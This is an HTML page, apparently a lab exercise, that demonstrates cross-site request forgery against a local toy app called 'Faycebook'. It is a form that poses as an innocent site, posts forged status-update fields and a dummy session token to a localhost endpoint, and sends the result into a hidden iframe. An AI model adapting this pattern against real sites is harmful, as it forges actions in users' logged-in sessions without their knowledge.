<html>
<head>
  <title>Faycebook Attack</title>
</head>
<body>
  <h1>I am an innocent website!</h1> 
  <small>dat CSRF dou</small>
  <form name="attackFaycebook" method="POST" id="attackFaycebook"
  action="http://localhost:5000/faycebook/add" target="hidden-form">
    <!--<input type="hidden" name="date" value="2014-04-01T22:50:49.762475" />
    <input type="hidden" name="user" value="Rawkcy" />
    <input type="hidden" name="status" value="I am poopingpppp." />
    <input type="hidden" name="__sessionToken" value="" />-->
    <input name="date" value="2014-04-01T22:50:49.762475" />
    <input name="user" value="Rawkcy" />
    <input name="status" value="I am poopingpppp." />
    <input name="__sessionToken" value="adsf" />
    <input type="submit" />
  </form>
  <iframe style="display:none" name="hidden-form"></iframe>
</body>
</html>
